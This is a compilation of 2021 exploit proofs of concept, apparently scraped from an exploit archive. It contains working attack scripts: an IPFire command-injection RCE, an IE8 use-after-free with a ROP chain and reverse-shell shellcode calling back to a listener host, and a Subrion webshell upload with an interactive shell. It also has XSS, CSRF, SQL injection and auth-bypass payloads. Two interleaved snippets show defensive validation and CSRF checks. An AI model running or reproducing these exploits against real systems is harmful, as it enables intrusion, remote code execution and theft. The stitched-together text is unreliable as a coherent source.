
# Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated)
# Date: 15/05/2021
# Exploit Author: Mücahit Saratar
# Vendor Homepage: https://www.ipfire.org/
# Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso
# Version: 2.25 - core update 156
# Tested on: parrot os 5.7.0-2parrot2-amd64
# CVE: CVE-2021-33393

#!/usr/bin/python3

import requests as R
import sys
import base64

# usage: script.py http://target:444 username password command
try:
    host = sys.argv[1]
    assert host[:4] == "http" and host[-1] != "/"
    url = host + "/cgi-bin/pakfire.cgi"
    username = sys.argv[2]
    password = sys.argv[3]
    komut = sys.argv[4]  # the command to append ("komut" is Turkish for "command")
except (IndexError, AssertionError):
    print(f"{sys.argv[0]} http://target.com:444 username password command")
    sys.exit(1)

# Form fields of the Pakfire "install" action. The INSPAKS package list is
# passed to a shell unvalidated, so everything after the ';' runs as a command.
veri = {
        "INSPAKS": f"7zip;{komut}",
        "ACTION": "install",
        "x": "10",
        "y": "6"}
# HTTP Basic credentials of the (authenticated) web UI user
token = "Basic " + base64.b64encode(f"{username}:{password}".encode()).decode()
header = {"Authorization": token,
        "Connection": "close",
        "Cache-Control": "max-age=0",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36",
        "Origin": host,
        "Sec-GPC": "1",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-User": "?1",
        "Sec-Fetch-Dest": "document",
        "Referer": host}


R.post(url, data=veri, headers=header, verify=False)
print("Done.")
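The fix side of the Pakfire issue above, as an added example that is not IPFire's own code: validate each INSPAKS entry against the known package list and hand the installer an argv list rather than a shell string, plus a triage function that flags captured pakfire.cgi POST bodies shaped like the PoC. The package set, the pattern and the pakfire command line are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl

# Packages the install form may legitimately name. Constructed sample for this
# example; a real check would load the names from the Pakfire repository index.
KNOWN_PAKS = {"7zip", "nano", "vim", "tmux", "iftop"}

# Shape of a bare package name (an assumption for the example): no whitespace,
# quotes or shell metacharacters can ever pass this pattern.
PAKNAME_RE = re.compile(r"^[a-z0-9][a-z0-9._+-]{0,63}$")


def validate_inspaks(raw):
    """Split the ';'-separated INSPAKS field and return the package names.

    Raises ValueError for any entry that is not a known package, so a value
    such as '7zip;id' fails on 'id' even though 'id' looks like a name.
    """
    names = []
    for part in raw.split(";"):
        part = part.strip()
        if not part:
            continue
        if not PAKNAME_RE.match(part) or part not in KNOWN_PAKS:
            raise ValueError(f"rejected INSPAKS entry: {part!r}")
        names.append(part)
    return names


def build_install_argv(raw):
    """Build an argv list for the installer instead of a shell command line.

    With subprocess.run(argv) and no shell, a ';' or space in user input can
    only ever be part of one argument, never the start of a second command.
    The '/usr/local/bin/pakfire install' invocation is illustrative.
    """
    return ["/usr/local/bin/pakfire", "install"] + validate_inspaks(raw)


def flag_requests(bodies):
    """Triage captured pakfire.cgi POST bodies (e.g. from a reverse proxy log):
    return (body, reason) for each install request whose INSPAKS fails validation."""
    findings = []
    for body in bodies:
        params = dict(parse_qsl(body, keep_blank_values=True))
        if params.get("ACTION") != "install":
            continue
        try:
            validate_inspaks(params.get("INSPAKS", ""))
        except ValueError as exc:
            findings.append((body, str(exc)))
    return findings


# Constructed sample bodies: a normal two-package install, one shaped like the
# PoC above (a command appended after ';'), and a request that is not an install.
SAMPLE_BODIES = [
    "INSPAKS=7zip%3Bnano&ACTION=install&x=10&y=6",
    "INSPAKS=7zip%3Bid&ACTION=install&x=10&y=6",
    "ACTION=update&x=1&y=1",
]

if __name__ == "__main__":
    print(build_install_argv("7zip;nano"))
    for body, reason in flag_requests(SAMPLE_BODIES):
        print("suspicious:", body, "->", reason)
```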
            
# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - 'Firstname' Persistent Cross Site Scripting (Authenticated)
# Date: 14-05-2021
# Exploit Author: Reza Afsahi
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: Linux parrot

# --- Description --- #

# The web application allows a member to inject a persistent Cross-Site Scripting payload, which is executed in both the member and the admin panel.

# --- Proof of concept --- #

1- Create an account, log in as a member and go to: http://localhost/APR/edit_info.php
2- Inject this payload into the Firstname input: <script>alert(document.cookie)</script>
3- Fill in the other inputs as you want (other inputs might be vulnerable as well), then click on the Update button.
4- Refresh the page and the XSS popup will be triggered.

5- Now, if the admin visits this page in his/her dashboard: http://localhost/APR/admin/members.php
6- Our XSS payload will be executed in the admin's browser.

** An attacker can use this vulnerability to take over the admin account **
            
# Exploit Title: Simple Chatbot Application 1.0 - 'Category' Stored Cross site Scripting
# Date: 16-05-2021
# Exploit Author: Vani K G
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html
# Version: 1.0
# Tested on: Windows 10/XAMPP

Stored Cross-site scripting (XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the
two. It occurs when a malicious script is injected directly into a
vulnerable web application.

Attack Vector :

This vulnerability allows the attacker to inject an XSS payload into the
Title field of the page; each time any user opens the website, the XSS
triggers and the attacker can steal the cookie according to the crafted
payload.

Vulnerable Parameters: Settings System Info field
Payload : <script>alert(1)</script>

Vulnerable URL :
http://localhost/chatbot/admin/?page=system_info

Steps To Reproduce :
1) Go to the admin Dashboard
2) Click on Settings and Select System Info.
3) Put Payload into the System name  input field.
4) Click on Save.
5) XSS payload will be triggered.
            
# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Cross Site Request Forgery (Add Admin)
# Date: 15-05-2021
# Exploit Author: Reza Afsahi
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: PHP 7.4.11 , Linux x64_x86


# --- Proof of concept --- #

# Vulnerable file : http://localhost/APR/admin/user.php

# Exploit:

<html>
<head>
   <title>Add Admin</title>
</head>
<body>
   <h1> Absolutely Not Vulnerable Site :D </h1>
<form method="POST" action="http://127.0.0.1/APR/admin/user.php">
   <input type="hidden" name="username" value="lol">
   <input type="hidden" name="password" value="321" >
   <button type="submit" name="submit">Click</button>
</form>
</body>
</html>
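The server-side check that the add-admin handler above lacks, as an added example (not the application's code): a per-session synchronizer token compared in constant time, plus an Origin/Referer check, run against a request shaped like the PoC form. The site origin is taken from the form's action URL; the attacker origin and the session dict are constructed for the example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# The application's own origin, taken from the PoC form's action URL.
SITE_ORIGIN = "http://127.0.0.1"


def issue_csrf_token(session):
    """Create a random per-session token, keep it server-side and return it
    so user.php can embed it in the add-admin form as a hidden field."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def origin_allowed(headers):
    """Browsers send Origin on cross-site POSTs; fall back to Referer when it
    is absent. A request carrying neither is treated as cross-site."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == SITE_ORIGIN


def csrf_check(session, headers, form):
    """Decide whether a POST to the add-admin handler may proceed.
    Returns (ok, reason). Both checks must pass; the token comparison is
    constant-time so the token cannot be guessed byte by byte."""
    if not origin_allowed(headers):
        return False, "cross-origin request"
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed requests: the PoC page above, served from an attacker-controlled
# origin, versus the real admin form on the site itself.
POC_HEADERS = {"Origin": "http://attacker.example"}
POC_FORM = {"username": "lol", "password": "321"}

if __name__ == "__main__":
    session = {}
    token = issue_csrf_token(session)
    print(csrf_check(session, POC_HEADERS, POC_FORM))
    print(csrf_check(session, {"Origin": SITE_ORIGIN}, {**POC_FORM, "csrf_token": token}))
```

Marking the session cookie SameSite=Lax stops the browser from attaching it to the PoC's cross-site POST in the first place; the token check remains the defence that does not depend on browser behaviour.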
            
HireHackking

Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free

# Exploit Title: Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free
# Date: 15/05/2021
# CVE : CVE-2013-3893
# PoC: https://github.com/travelworld/cve_2013_3893_trigger.html/blob/gh-pages/params.json
# Exploit Author: SlidingWindow
# Vendor Advisory: https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2013/2887505?redirectedfrom=MSDN
# Tested on: Microsoft Internet Explorer 8 (version: 8.0.7601.17514) on Windows 7 SP1 (Version 6.1 Build 7601 SP1)
# Bypasses: DEP, ASLR using MSVCR71.DLL
# Thanks to @corelanc0d3r for awesome Heap Exploitation Training and @offsectraining for OSCP training

<html>
<script>
var spraychunks = new Array();

// Use BSTR spray since DEPS spray didn't work here
function heapspray() {
    var ropchain = unescape("%u122c%u0c0c"); //EAX now points here. EDX = [EAX+0x70]. So call EDX will take a forward jump to stack-heap flip: 0x7c348b05 : # XCHG EAX,ESP # RETN

    //ESP points here after stack-heap flip. jump over padding+stack-heap flip into ROP chain.
    ropchain += unescape("%u6bd5%u7c36"); //0x7c366bd5 : # ADD ESP,100 # RETN ** [MSVCR71.dll] ** | {PAGE_EXECUTE_READ}

    //Some padding
    ropchain += unescape("%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565");

    //ESP will point to 0x0c0c122c after stack-heap flip.
    ropchain += unescape("%u8b05%u7c34"); //0x7c348b05 : # XCHG EAX,ESP # RETN ** [MSVCR71.dll] ** | {PAGE_EXECUTE_READ}

    //More padding for ADD ESP, 100
    ropchain += unescape("%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565");

    //rop chain generated with mona.py - www.corelan.be
    //ropchain needed a little fix
    ropchain += unescape(
        "" +             // #[---INFO:gadgets_to_set_ebp:---] :
        "%u1cab%u7c35" + // 0x7c351cab : ,# POP EBP # RETN [MSVCR71.dll]
        "%u1cab%u7c35" + // 0x7c351cab : ,# skip 4 bytes [MSVCR71.dll]
        "" +             // #[---INFO:gadgets_to_set_ebx:---] :
        "%u728e%u7c34" + // 0x7c34728e : ,# POP EAX # RETN [MSVCR71.dll]
        "%ufdff%uffff" + // 0xfffffdff : ,# Value to negate, will become 0x00000201
        "%u684b%u7c36" + // 0x7c36684b : ,# NEG EAX # RETN [MSVCR71.dll]
        "%u1695%u7c37" + // 0x7c371695 : ,# POP EBX # RETN [MSVCR71.dll]
        "%uffff%uffff" + // 0xffffffff : ,#
        "%u5255%u7c34" + // 0x7c345255 : ,# INC EBX # FPATAN # RETN [MSVCR71.dll]
        "%u2174%u7c35" + // 0x7c352174 : ,# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [MSVCR71.dll]
        "" +             // #[---INFO:gadgets_to_set_edx:---] :
        "%u5937%u7c34" + // 0x7c345937 : ,# POP EDX # RETN [MSVCR71.dll]
        "%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040
        "%u1eb1%u7c35" + // 0x7c351eb1 : ,# NEG EDX # RETN [MSVCR71.dll]
        "" +             // #[---INFO:gadgets_to_set_ecx:---] :
        "%u0c81%u7c36" + // 0x7c360c81 : ,# POP ECX # RETN [MSVCR71.dll]
        "%ucd8c%u7c38" + // 0x7c38cd8c : ,# &Writable location [MSVCR71.dll]
        "" +             // #[---INFO:gadgets_to_set_edi:---] :
        "%u4648%u7c35" + // 0x7c354648 : ,# POP EDI # RETN [MSVCR71.dll]
        "%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [MSVCR71.dll]
        "" +             // #[---INFO:gadgets_to_set_esi:---] :
        "%u50dd%u7c36" + // 0x7c3650dd : ,# POP ESI # RETN [MSVCR71.dll]
        "%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [MSVCR71.dll]
        "%u5194%u7c34" + // 0x7c345194 : ,# POP EAX # RETN [MSVCR71.dll]
        // "%ua140%u7c37" + // 0x7c37a140 : ,# ptr to &VirtualProtect() [IAT MSVCR71.dll]
        // "%ua051%u7c37" + // 7c37a051 + 0xEF should become 0x7c37a140, which is a pointer to &VirtualProtect()
        // Because next instruction adds 0xEF into AL.
        "%ua151%u7c37" + // 7c37a151 + + 0xEF should become 0x7c37a140, which is a pointer to &VirtualProtect()
        // Because next instruction adds 0xEF into AL.
        "" +             // #[---INFO:pushad:---] :
        "%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll]
        "" +             // #[---INFO:extras:---] :
        "%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [MSVCR71.dll]
        ""); // :

    // msfvenom -p windows/shell_reverse_tcp -a x86 lhost=192.168.154.130 lport=4444 -b '\x00' -f js_le
    // First few bytes, %uc481%ufa24%uffff (which is \x81\xc4\x24\xfa\xff\xff # add esp,-1500) move ESP away from EIP to avoid GetPC() routine from corrupting our shellcode
    var shellcode = unescape("%uc481%ufa24%uffff%uccd9%u74d9%uf424%ube5d%uba98%ue3da%uc931%u52b1%u7531%u8317%u04c5%ued03%u38a9%uf116%u3e26%u09d9%u5fb7%uec53%u5f86%u6507%u6fb8%u2b43%u1b35%udf01%u69ce%ud08e%uc767%udfe8%u7478%u7ec8%u87fb%ua01d%u47c2%ua150%ub503%uf399%ub1dc%ue30c%u8f69%u888c%u0122%u6d95%u20f2%u20b4%u7a88%uc316%uf75d%udb1f%u3282%u50e9%uc870%ub0e8%u3148%ufd46%uc064%u3a96%u3b42%u32ed%uc6b0%u81f6%u1cca%u1172%ud66c%ufd24%u3b8c%u76b2%uf082%ud0b0%u0787%u6b14%u8cb3%ubb9b%ud635%u1fbf%u8c1d%u06de%u63fb%u58de%udca4%u137a%u0849%u7ef7%ufd06%u803a%u69d6%uf34c%u36e4%u9be6%ube44%u5c20%u95aa%uf295%u1655%udbe6%u4291%u73b6%ueb33%u835d%u3ebc%ud3f1%u9112%u83b2%u41d2%uc95b%ubedc%uf27b%ud736%u0916%u18d1%u8b4e%uf1a3%uab8d%u5db2%u4d1b%u4dde%uc64d%uf777%u9cd4%uf8e6%ud9c2%u7229%u1ee1%u73e7%u0c8c%u7390%u6edb%u8b37%u06f1%u1edb%ud69e%u0292%u8109%uf5f3%u4740%uacee%u75fa%u29f3%u3dc4%u8a28%ubccb%ub6bd%uaeef%u367b%u9ab4%u61d3%u7462%udb92%u2ec4%ub74c%ua68e%ufb09%ub010%ud615%u5ce6%u8fa7%u63be%u5808%u1c37%uf874%uf7b8%u083c%u55f3%u8114%u0c5a%ucc24%ufb5c%ue96b%u09de%u0e14%u78fe%u4a11%u91b8%uc36b%u952d%ue4d8%u4167");

    var junk = unescape("%u2020%u2020");
    while (junk.length < 0x4000) junk += junk;
    offset = 0x204/2 ; //0c0c1228
    var junk_front = junk.substring(0,offset);
    var junk_end = junk.substring(0,0x800 - junk_front.length - ropchain.length - shellcode.length)
    var smallblock = junk_front + ropchain + shellcode + junk_end;
    var largeblock = "";
    while (largeblock.length < 0x80000) {
        largeblock = largeblock + smallblock;
    }
    // make allocations
    for (i = 0; i < 0x450; i++) {
        spraychunks[i] = largeblock.substring(0, (0x7fb00-6)/2);
    }
}

function alloc(nr_alloc){
    for (var i=0; i < nr_alloc; i++){
        divobj = document.createElement('div');
        // Allocate 0x25 (37 decimal) bytes. Vulnerable object size = 0x4c bytes
        divobj.className = "\u1228\u0c0c\u4141\u4141\u4242\u4242\u4343\u4343\u4444\u4444\u4545\u4545\u4646\u4646" +
                           "\u4747\u4747\u4848\u4949\u4949\u5050\u5050\u5151\u5151\u5252\u5252\u5353\u5353\u5454" +
                           "\u5454\u5555\u5555\u5656\u5656\u5757\u5757\u5858\u5858";
    }
}

heapspray();

function trigger() {
    var id_0 = document.createElement("sup");
    var id_1 = document.createElement("audio");
    heapspray();
    document.body.appendChild(id_0);
    document.body.appendChild(id_1);
    id_1.applyElement(id_0);
    id_0.onlosecapture=function(e) {
        //Vulnerable Object is freed here
        document.write("");
        //Replace/Reclaim the freed object here.
        //Object size is 0x4c
        alloc(0x20);
    }
    id_0['outerText']="";
    id_0.setCapture();
    id_1.setCapture();
}

window.onload = function() {
    trigger();
}
</script>
</html>

<!-- Debug: Taking a different code path for this exploit
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000003 ebx=00000100 ecx=40404040 edx=00000001 esi=0089c098 edi=00000000
eip=7467b68d esp=0301c34c ebp=0301c360 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
mshtml!CElement::Doc:
7467b68d 8b01            mov     eax,dword ptr [ecx]  ds:002b:40404040=????????
0:005> u eip
mshtml!CElement::Doc:
7467b68d 8b01            mov     eax,dword ptr [ecx]
7467b68f 8b5070          mov     edx,dword ptr [eax+70h]
7467b692 ffd2            call    edx
7467b694 8b400c          mov     eax,dword ptr [eax+0Ch]
7467b697 c3              ret
7467b698 90              nop
7467b699 90              nop
7467b69a 90              nop
0:005> ub eip
mshtml!CElement::SecurityContext+0x22:
7467b681 8b01            mov     eax,dword ptr [ecx]
7467b683 8b5070          mov     edx,dword ptr [eax+70h]
7467b686 ffe2            jmp     edx
7467b688 90              nop
7467b689 90              nop
7467b68a 90              nop
7467b68b 90              nop
7467b68c 90              nop

# Exploit Title: Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS)
# Date: 17/08/2021
# Exploit Author: Abdulkadir AYDOGAN
# Vendor Homepage: https://www.ampps.com/apps/guestbooks/Advanced_Guestbook
# Software Link: https://www.ampps.com/apps/guestbooks/Advanced_Guestbook
# Version: 2.4.4

Advanced Guestbook is a free open source guestbook script developed in PHP. Examples of features include email notifications, uploading pictures, html tags handling, multiple polls, comments and themes.

#Description

The following is a PoC for the XSS bug, using an authorized user.

Firstly, an emotion object has four parts:
- Emotion icon
- Emotion file name
- Emotion command which will be used to call this object (s_code)
- Emotion description (s_emotion)

Here are the exploitation steps for the vulnerability:
1. Login to your admin account.
2. Go to "Smilies" tab to view and edit emotion icons
3. Click "edit" text in the "Action" column to edit emotions
4. Change emotion description to Javascript code
5. Click the "Submit Settings"
6. Click "Smilies" tab again to view all emotions and Javascript code will be executed

# Vulnerable Parameter Type: POST
# Vulnerable Parameter: s_emotion
# Attack Pattern: <script>alert("Smile more!")</script>

#PoC HTTP Request:

POST /advancedguestbook/admin.php HTTP/1.1
Host: HOST_ADDRESS
Content-Length: 175
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://HOST_ADDRESS
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://HOST_ADDRESS/advancedguestbook/admin.php?action=smilies&session=17395de9919fffa0ac9476370c2c7ba0&uid=1&edit_smilie=7
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: _ga=GA1.2.2068746825.1621203842; _gid=GA1.2.1432458757.1621203842; _gat=1
Connection: close

s_code=:cool:&s_emotion=<script>alert("Smile more!")</script>&edit_smilie=7&uid=1&session=17395de9919fffa0ac9476370c2c7ba0&action=smilies&add_smilies=1

EgavilanMedia PHPCRUD 1.0 - 'First Name' SQL Injection

# Exploit Title: EgavilanMedia PHPCRUD 1.0 - 'First Name' SQL Injection
# Date: 5/17/2021
# Exploit Author: Dimitrios Mitakos
# Vendor Homepage: https://egavilanmedia.com
# Software Link: https://egavilanmedia.com/crud-operation-with-php-mysql-bootstrap-and-dompdf/
# Version: 1.0
# Tested on: Debian GNU/Linux 10

Vulnerable Parameter : firstname

1. Burp Suite -> Intercept is on
2. Go to the Website -> Add New Record
3. Back to Burp Suite -> Copy to file (r.txt)

POST /insert.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/index.php
Upgrade-Insecure-Requests: 1

firstname=x&lastname=y&address=z&skills=w&designation=a&insertData=

4. sqlmap -r r.txt --dump

Subrion CMS 4.2.1 - Arbitrary File Upload

# Exploit Title: Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated)
# Date: 17/05/2021
# Exploit Author: Fellipe Oliveira
# Vendor Homepage: https://subrion.org/
# Software Link: https://github.com/intelliants/subrion
# Version: SubrionCMS 4.2.1
# Tested on: Debian9, Debian 10 and Ubuntu 16.04
# CVE: CVE-2018-19422
# Exploit Requirements: BeautifulSoup library
# https://github.com/intelliants/subrion/issues/801

#!/usr/bin/python3

import requests
import time
import optparse
import random
import string
from bs4 import BeautifulSoup

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri http://target/panel")
parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")
parser.add_option('-p', '--passw', action="store", dest="passw", help="Password credential to login")

options, args = parser.parse_args()
if not options.url:
    print('[+] Specify an url target')
    print('[+] Example usage: exploit.py -u http://target-uri/panel')
    print('[+] Example help usage: exploit.py -h')
    exit()

url_login = options.url
url_upload = options.url + 'uploads/read.json'
url_shell = options.url + 'uploads/'
username = options.user
password = options.passw

session = requests.Session()


def login():
    global csrfToken
    print('[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 \n')
    print('[+] Trying to connect to: ' + url_login)
    try:
        get_token_request = session.get(url_login)
        soup = BeautifulSoup(get_token_request.text, 'html.parser')
        csrfToken = soup.find('input', attrs={'name': '__st'})['value']
        print('[+] Success!')
        time.sleep(1)
        if csrfToken:
            print(f"[+] Got CSRF token: {csrfToken}")
            print("[+] Trying to log in...")
            auth_url = url_login
            auth_cookies = {"loader": "loaded"}
            auth_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/", "Upgrade-Insecure-Requests": "1"}
            auth_data = {"__st": csrfToken, "username": username, "password": password}
            auth = session.post(auth_url, headers=auth_headers, cookies=auth_cookies, data=auth_data)
            if len(auth.text) <= 7000:
                print('\n[x] Login failed... Check credentials')
                exit()
            else:
                print('[+] Login Successful!\n')
        else:
            print('[x] Failed to got CSRF token')
            exit()
    except requests.exceptions.ConnectionError as err:
        print('\n[x] Failed to Connect in: '+url_login+' ')
        print('[x] This host seems to be Down')
        exit()
    return csrfToken


def name_rnd():
    global shell_name
    print('[+] Generating random name for Webshell...')
    shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15)))
    time.sleep(1)
    print('[+] Generated webshell name: '+shell_name+'\n')
    return shell_name


def shell_upload():
    print('[+] Trying to Upload Webshell..')
    try:
        up_url = url_upload
        up_cookies = {"INTELLI_06c8042c3d": "15ajqmku31n5e893djc8k8g7a0", "loader": "loaded"}
        up_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------6159367931540763043609390275", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/uploads/"}
        up_data = "-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n17978446266285\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"__st\"\r\n\r\n"+csrfToken+"\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\""+shell_name+".phar\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n1621210391\r\n-----------------------------6159367931540763043609390275--\r\n"
        session.post(up_url, headers=up_headers, cookies=up_cookies, data=up_data)
    except requests.exceptions.HTTPError as conn:
        print('[x] Failed to Upload Webshell in: '+url_upload+' ')
        exit()


def code_exec():
    try:
        url_clean = url_shell.replace('/panel', '')
        req = session.get(url_clean + shell_name + '.phar?cmd=id')
        if req.status_code == 200:
            print('[+] Upload Success... Webshell path: ' + url_shell + shell_name + '.phar \n')
            while True:
                cmd = input('$ ')
                x = session.get(url_clean + shell_name + '.phar?cmd='+cmd+'')
                print(x.text)
        else:
            print('\n[x] Webshell not found... upload seems to have failed')
    except:
        print('\n[x] Failed to execute PHP code...')


login()
name_rnd()
shell_upload()
code_exec()

WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)

# Exploit Title: WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)
# Author: Luis Martinez
# Discovery Date: 2021-05-18
# Vendor Homepage: https://apps.apple.com/mx/app/webssh-ssh-client/id497714887
# Software Link: App Store for iOS devices
# Tested Version: 14.16.10
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 14.5.1

# Steps to Produce the Crash:
# 1.- Run python code: WebSSH_for_iOS_14.16.10.py
# 2.- Copy content to clipboard
# 3.- Open "WebSSH for iOS"
# 4.- Click -> Tools
# 5.- Click -> mashREPL
# 6.- Paste ClipBoard on "mashREPL>"
# 7.- Intro
# 8.- Crashed

#!/usr/bin/env python
buffer = "\x41" * 300
print (buffer)

# Exploit Title: WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)
# Date: 04/08/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://wordpress.org/plugins/stop-spammer-registrations-plugin/
# Software Link: https://downloads.wordpress.org/plugin/stop-spammer-registrations-plugin.zip
# Version: <= 2021.8
# Tested on: Windows-Ubuntu
# CVE : CVE-2021-24245

Summary:
Reflected cross-site scripting (XSS) vulnerabilities in 'Stop Spammers <= 2021.8' allow remote attackers to run arbitrary javascript

Proof of concept:
1-Install "Stop Spammers <= 2021.8" in your wordpress website
2-For testing remove your IP address from the allowed list
3-Go to http://<YOUR-WEBSITE>/wp-admin
4-In username field enter this payload ~> ad" accesskey=X onclick=alert(1) "   #Notice the `ad` keyword must be in your payload!
5-Press Alt + Shift + X to trigger Xss   #Tested on Firefox

Request POC:

POST /wp-login.php HTTP/1.1
Host: localhost
Connection: close
Content-Length: 161
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_test_cookie=WP+Cookie+check;

log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1

# Exploit Title: COVID19 Testing Management System 1.0 - SQL Injection (Auth Bypass)
# Date: 19/05/2021
# Exploit Author: Rohit Burke
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10

SQL Injection:
Injection flaws, such as SQL, NoSQL, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

Attack vector:
An attacker can gain admin panel access using malicious SQL injection queries.

Steps to reproduce:
1) Open the admin login page using the following URL: "http://localhost/covid-tms/login.php"
2) Now put the payload below in the Username and Password fields.

Payload: admin' or '1'='1

and you will be successfully logged in as Admin without any credentials.
